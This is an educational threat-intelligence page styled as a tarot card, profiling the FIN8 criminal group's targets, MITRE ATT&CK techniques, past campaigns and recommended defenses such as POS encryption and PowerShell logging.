The Hospitality Thief: FIN8

← Home·Gallery·Techniques

Threat Intelligence Tarot

cups · 4

Criminal (Eastern European, suspected)

G0061

★★★★★

risk 4/5

✦ The Hospitality Thief ✦

FIN8

Syssphinx

HospitalityRetailEntertainmentRestaurantsFinancial services

Active since ~2016 · Point-of-sale payment card theft, Ransomware (pivot 2021), Retail and hospitality targeting

It studied the hospitality industry's POS systems, found the gap between checkout and settlement, and inserted itself there. Millions of card numbers, captured at the swipe, sold in batches. The Hospitality Thief is patient - it disappears for months and returns when defenses relax.

Tactics & Techniques

RCN

RDV

INI

EXC

PRS

PRV

EVA

CRD

DSC

LAT

COL

EXF

IMP

T1566.001

Spearphishing Attachment

Initial Access

T1059.001

PowerShell

Execution

T1055

Process Injection

Defense Evasion

T1003

OS Credential Dumping

Credential Access

T1486

Data Encrypted for Impact

Impact

T1134

Access Token Manipulation

Privilege Escalation

Notable Operations

◆US retail and hospitality POS skimmer campaigns
◆BADHATCH backdoor deployment across hospitality chains
◆Pivot to Noberus/ALPHV ransomware affiliate (2021–2022)
◆Years-long gaps between campaigns - careful operational pacing

Defenses

▸
Point-to-point encryption for all POS card data
PCI DSS Requirement 4
▸
Network segmentation isolating POS systems
PCI DSS Requirement 1
▸
PowerShell logging and constrained language mode
CIS Control 8 ↗
▸
POS system integrity monitoring and allowlisting
CIS Control 2 ↗

Reversed: Their Weakness

FIN8's unusual operational pattern - long pauses between campaigns - reflects a discipline that paradoxically aids defenders: extended quiet periods allow threat intelligence to go stale, but also give defenders time to reset, patch, and update detection capabilities.

Share this adversary profile

← → arrow keys to browse

swipe to browse

← PreviousThe Insider Next →The Broker

Related Adversaries

Data sourced from MITRE ATT&CK. For educational purposes.